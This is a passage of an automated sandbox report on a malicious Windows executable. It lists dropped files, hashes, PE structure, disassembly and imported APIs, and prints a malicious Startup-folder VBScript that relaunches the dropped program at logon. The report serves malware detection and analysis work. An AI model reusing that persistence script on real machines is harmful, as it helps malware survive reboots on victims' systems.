                                                                                                                  SHA-512:ECCE445BBE23F600D09357DF1CD4488F958BE9E2981B68A2DCBA82DC41507F2B5F391AB97C7F13418B638B41F7DBB5E8D8D8946F317090D72B715EB23067D6AD
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                  Reputation:low
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...xcRg.........."..........:.......}............@.................................RE....@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\aut235A.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.

                                                                                                                  C:\Users\user\AppData\Local\Temp\aut31A3.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.

                                                                                                                  C:\Users\user\AppData\Local\Temp\aut6C3B.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):138314
                                                                                                                  Entropy (8bit):7.943258750504413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:WvKmeUg+FFcFTTbBQ7Kvt927RByWQpRPxHkLToTiDkbNL5La3lhLYO:WvKmebfFTZQ7+927DQRtTisNL5cLYO
                                                                                                                  MD5:B5931AEAE1266F6FEC913F47AF16824A
                                                                                                                  SHA1:B7E0E29BE9E89492A98272EADEFA61F0E2CB1CC2
                                                                                                                  SHA-256:31F3F7D5A6B7406750DC83BCCD0CC0233BC9BDF6B43EE0E0DE1FC8E6516F7AA1
                                                                                                                  SHA-512:37023245E52390C233DD763316A79D15A0A399D24771A49D630A09A82C71DD1AB6B44979C613BD23DA888A86D4C5BF1EE0E16B86081B04A0C34A6E5B8AD846E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:EA06..<..B8.*..sC.Q.~.mC.T.Uj..5.L)u*...4N.....mC...fd.5....>.c)..<.7y..o?..~u?..&.e~k$..%.ymZyF.N.V.=..k.."QHM..U.He..4...N..K.F.u:7.....4k.V.M..K..t.L.. .,G..*....hU...D..V..A......i....@......*].8...8..[.U.@....hw!v.L ....{C...:.m.R.5.........M....+2.@..;....t......."...R....'z.5.T,..-.f.h.NR..B..4G..._...0..&5..vkX.......&o.....P..[|r(.p....jTi.....7.Y..v.h|....)I.{..? ..v.[.......s....RfT...a[.4.........B..hG@.......N%.......'.@...hB... ..>.4(........*s...oN......Z1....s.o..0........&.j...V.t(.[...H.Pv.p""K~..'.)...R.B...E.J....2..T...Wa.U.....2.....G".>...(.2o....0i...........cS.U;....5U._...4.......|v....+U.."=2.Ze...B....4~D..6.......V@..?.....kTp..Ygu....8..%...2c..Xn..5B.=.N-.y.......I4.......Je..9.....U:.6../.+..k.....B12.R.R.<._.M.s..F.X..+.).6.|.T'.Z..G..)sjLz.I....8. .K..'..V.N....I..(..-..\.w..,....L.|....[.Ef.).&.+..N..u..3..N..<.^...I...N.Do3.=>...|.s...n..G..N.. .Q.t...h.pM(.Y..\...uz...Q'S....L.My...?..hM..p..z.N@..P.

                                                                                                                  C:\Users\user\AppData\Local\Temp\finitism

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):277504
                                                                                                                  Entropy (8bit):6.9765305980486465
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:nhlhTcDmgzaN8ykgkddaVurF8tAZP7tLeJvDdAwH0n6JTMyY6ivWqQNZQVaQQ:nHhTcDmBNKJddvrF7ZP7tLeJvWwH0n6B
                                                                                                                  MD5:5FBD6058183AAFEED251AEBEF4E95C86
                                                                                                                  SHA1:5BB675DD54499A4871B59A591FB93A18C2B16CAE
                                                                                                                  SHA-256:3D400363AA132D92879C2454A0F0F49CD34D8CF697758FA6D9E8E43070525E9C
                                                                                                                  SHA-512:1FB7DE85E641EED5BF2BD95132ABC21630F4D6F054C7FDBA0029D4674142F53D47DCC3037638D16BCE2C641A0235AA23726B50704CBB223ADC80EB8CB51616D6
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:...2SF9C<GEH.6C.S2VX7L5r0KRV2PF9C8GEH0K6C8S2VX7L520KRV2PF9C.GEH>T.M8.;.y.My...:?Ap6K,_5$%.(W-V<Fv:RlGG^k;8...jcU(!-.F;I.S2VX7L5buKR.3SF..!EH0K6C8S.VZ6G4b0KtR2PR9C8GEH..2C8s2VXWH520.RV.PF9A8GAH0K6C8S6VX7L520K.R2PD9C8GEH2Kv.8S"VX'L520[RV"PF9C8GUH0K6C8S2VX7.v60.RV2P&=C/WEH0K6C8S2VX7L520KRV.TF5C8GEH0K6C8S2VX7L520KRV2PF9C8GEH0K6C8S2VX7L520KRV2PF9c8GMH0K6C8S2VX7D.20.RV2PF9C8GEH.?S;LS2Vl.H52.KRV.TF9A8GEH0K6C8S2VX7l52Pe %@3F9C/WEH0+2C8A2VX.H520KRV2PF9C8G.H0..1]?]5X7@520K.R2PD9C8}AH0K6C8S2VX7L5r0K.V2PF9C8GEH0K6C8S".\7L520.RV2RF<Cl.GH..7C;S2V.7L3..IR.2PF9C8GEH0K6C8S2VX7L520KRV2PF9C8GEH0K6C8S2V.J.:...;%..F9C8GEI2H2E0[2VX7L5205RV2.F9CxGEH.K6C.S2V57L5.0KR(2PFGC8G!H0KDC8SSVX7.520$RV2>F9CFGEH.I.c8S8|~7N..0KXV..5.C8M.I0K20.S2\.5L56CoRV8.E9C<4`H0A.G8S6%~7L?.5KRR..F:..AEH+$.C8Y2U."J52+atV0x|9C2Gon0H.V>S2Mr.L7.9KRR..5$C8Am.0K<71S2T.=L56.UP~vPF3i.9NH0O.C.qLZX7H.2.i,[2PB.C.YG.=K6G.qLXX7H.2.i,Y2PB.C.YG.?K6G.qLFX7H.2.i,G2PB.C.e;Z0K2h8y.(K7L1.0ap(&PF=h8mg6%K6G.S.t&!L56.KxtLGF9G.GojNS6C<x2|F5.-20OxP.2FKb.G5K

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Allene\ectosphere.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):276
                                                                                                                  Entropy (8bit):3.3623495373934764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1klADiNDdnriIM8lfQVn:DsO+vNlzQ1klADizmA2n
                                                                                                                  MD5:5CA8B698A3F50D005575AE4E6C5FD4BC
                                                                                                                  SHA1:BABD579418B3C5CA6C5538045DE33383A5EA1524
                                                                                                                  SHA-256:659542ED2B6392DC0C0679A23E47A07D1C02CCC50C86FAC9B48901209A331D44
                                                                                                                  SHA-512:6D16D135A72E8E2D09921B9DA58D36791671AD5A762B5A1A837BEAA7CA293F5A15040E0FA552AA83BA9BDBF4872BCB43524A791891AEC223B4F117E6B06CFAAB
                                                                                                                  Malicious:true
                                                                                                                  Reputation:low
                                                                                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.A.l.l.e.n.e.\.e.c.t.o.s.p.h.e.r.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.051987070428753
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:6BRa130JDj.exe
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5:cb47b81059d6e0b15ad2ab00c3491c48
                                                                                                                  SHA1:4cf91a5e49a4d17f2c0d35bc52dee15ecdf155dc
                                                                                                                  SHA256:e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87
                                                                                                                  SHA512:ecce445bbe23f600d09357df1cd4488f958be9e2981b68a2dcba82dc41507f2b5f391ab97c7f13418b638b41f7dbb5e8d8d8946f317090d72b715eb23067d6ad
                                                                                                                  SSDEEP:24576:Du6J33O0c+JY5UZ+XC0kGso6FaPAlbrjFTSd7DqBWY:Nu0c++OCvkGs9FaP6FTy7D/Y
                                                                                                                  TLSH:3E25BD2273DEC360CB769173BF69B3056EBF7C610630B85B2F980D79A950161266C7A3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:32789ab292d2d20d

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x67526378 [Fri Dec 6 02:37:44 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F2F108447AAh
                                                                                                                  jmp 00007F2F10837574h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007F2F108376FAh
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007F2F10837A5Eh
                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                  jnc 00007F2F108376F9h
                                                                                                                  rep movsb
                                                                                                                  jmp 00007F2F10837A0Ch
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007F2F108378C4h
                                                                                                                  mov eax, edi
                                                                                                                  xor eax, esi
                                                                                                                  test eax, 0000000Fh
                                                                                                                  jne 00007F2F10837700h
                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                  jc 00007F2F10837BD0h
                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                  jnc 00007F2F1083789Dh
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007F2F108378AEh
                                                                                                                  test esi, 00000003h
                                                                                                                  jne 00007F2F1083788Dh
                                                                                                                  bt edi, 02h
                                                                                                                  jnc 00007F2F108376FFh
                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                  sub ecx, 04h
                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [edi], eax
                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                  bt edi, 03h
                                                                                                                  jnc 00007F2F10837703h
                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                  sub ecx, 08h
                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                  test esi, 00000007h
                                                                                                                  je 00007F2F10837755h
                                                                                                                  bt esi, 03h
                                                                                                                  jnc 00007F2F108377A8h

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x393e0.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1010000x711c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xc70000x393e00x39400e4e99faa9f0566a92f34cbcd36bff62cFalse0.9555472161572053data7.935427462648645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x1010000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                  RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                  RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                  RT_ICON0xc77d00xda8Device independent bitmap graphic, 26 x 64 x 32, image size 3328, resolution 5669 x 5669 px/mEnglishGreat Britain0.32179633867276886
                                                                                                                  RT_MENU0xc85780x50dataEnglishGreat Britain0.9
                                                                                                                  RT_STRING0xc85c80x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                  RT_STRING0xc8b5c0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                  RT_STRING0xc91e80x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                  RT_STRING0xc96780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                  RT_STRING0xc9c740x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                  RT_STRING0xca2d00x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                  RT_STRING0xca7380x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                  RT_RCDATA0xca8900x35631data1.0003475509093487
                                                                                                                  RT_GROUP_ICON0xffec40x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0xffed80x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0xffeec0x14dataEnglishGreat Britain1.15
                                                                                                                  RT_GROUP_ICON0xfff000x14dataEnglishGreat Britain1.25
                                                                                                                  RT_VERSION0xfff140xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                  RT_MANIFEST0xffff00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, 